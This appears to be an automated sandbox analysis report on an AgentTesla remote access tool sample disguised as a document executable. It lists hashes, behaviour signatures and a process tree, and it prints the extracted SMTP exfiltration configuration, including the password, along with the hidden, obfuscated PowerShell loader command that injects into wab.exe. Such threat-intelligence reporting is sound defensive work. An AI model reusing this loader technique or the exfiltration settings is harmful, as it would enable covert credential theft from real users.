Analysis
-
max time kernel
147s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
24-06-2024 11:17
Static task
static1
Behavioral task
behavioral1
Sample
doc20240624-00073.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
doc20240624-00073.exe
Resource
win10v2004-20240508-en
General
-
Target
doc20240624-00073.exe
-
Size
623KB
-
MD5
43970c342a6f6849918eff777d391439
-
SHA1
58a9e9e70a97dc454e5462259a90709c8df789f6
-
SHA256
9a46488fbf68e28b2f3e84183fe6100ad7b0a0f72628ca90f02de0b05a8ff5fc
-
SHA512
e6ab83f9431d3baa50201947a06851f5b74916b48b64d068cddb453c5addc9b7cf39d1246d83d70fc18fadb46c854f6c22535d42a080ee9d624ff9fb30104200
-
SSDEEP
6144:Z4SUjhtcUB6uitM/DOfM1PzrgFswogtKxaqcYe29nOAw3YLS/KSGBG9xNG1E:CilWLe+P0swbEXcX2NOAK/KH8NGC
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
cpanel17.rackforest.com - Port:
587 - Username:
[email protected] - Password:
boygirl123456 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2372 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2556 powershell.exe 2372 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2556 set thread context of 2372 2556 powershell.exe wab.exe -
Drops file in Windows directory 2 IoCs
Processes:
doc20240624-00073.exedescription ioc process File opened for modification C:\Windows\Fonts\Impeccability29\Saxten.luc doc20240624-00073.exe File opened for modification C:\Windows\resources\Strmpeskafterne\Tortrix.ini doc20240624-00073.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exewab.exepid process 2556 powershell.exe 2556 powershell.exe 2556 powershell.exe 2556 powershell.exe 2556 powershell.exe 2556 powershell.exe 2556 powershell.exe 2556 powershell.exe 2372 wab.exe 2372 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewab.exedescription pid process Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 2372 wab.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
doc20240624-00073.exepowershell.exedescription pid process target process PID 2964 wrote to memory of 2556 2964 doc20240624-00073.exe powershell.exe PID 2964 wrote to memory of 2556 2964 doc20240624-00073.exe powershell.exe PID 2964 wrote to memory of 2556 2964 doc20240624-00073.exe powershell.exe PID 2964 wrote to memory of 2556 2964 doc20240624-00073.exe powershell.exe PID 2556 wrote to memory of 2372 2556 powershell.exe wab.exe PID 2556 wrote to memory of 2372 2556 powershell.exe wab.exe PID 2556 wrote to memory of 2372 2556 powershell.exe wab.exe PID 2556 wrote to memory of 2372 2556 powershell.exe wab.exe PID 2556 wrote to memory of 2372 2556 powershell.exe wab.exe PID 2556 wrote to memory of 2372 2556 powershell.exe wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\doc20240624-00073.exe"C:\Users\Admin\AppData\Local\Temp\doc20240624-00073.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Egebjergs=Get-Content 'C:\Users\Admin\AppData\Local\cardioparplasis\navnlse\Salomes.Ord';$Tergant254=$Egebjergs.SubString(50482,3);.$Tergant254($Egebjergs)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\cardioparplasis\navnlse\Pipetting.blaFilesize
323KB
MD5a4f70a014d8973f08700e2ee02cd565e
SHA1cf484471a00a331264a810a6b4b9945f56d3ec58
SHA2569953bb9da1b287b48eaa39be1e23f510dd49f13fed83a95f0b470de8f8dd8220
SHA512a09212a0b602ece3eb7b9209b189dfb0a138c428bbb5acf645fce1a4ebb2af6a0908de32d2cd16061f89f92163281f77e7b6bc54fed2a88c00518fc27070f6f9
-
C:\Users\Admin\AppData\Local\cardioparplasis\navnlse\Salomes.OrdFilesize
49KB
MD5d4967d4847a0f4364f49c4724bf309b6
SHA12c1eb423b2e150b7c25ab03549eb903b645f2481
SHA25627abbbba12f54d62ab075cd90263e61cc47e03c8c4f4555644843b9f3182da0f
SHA51263ad7d1ef9d3487f66fb8c05abe30bce0cd5f9558d0db709c387225f8686701fadfe1b528031792689f58c91dd722184a4ca2ee50756866ccb133d0b68e79b76
-
memory/2372-32-0x0000000000BA0000-0x0000000001C02000-memory.dmpFilesize
16.4MB
-
memory/2372-33-0x0000000000BA0000-0x0000000000BE2000-memory.dmpFilesize
264KB
-
memory/2556-16-0x0000000006640000-0x00000000071B6000-memory.dmpFilesize
11.5MB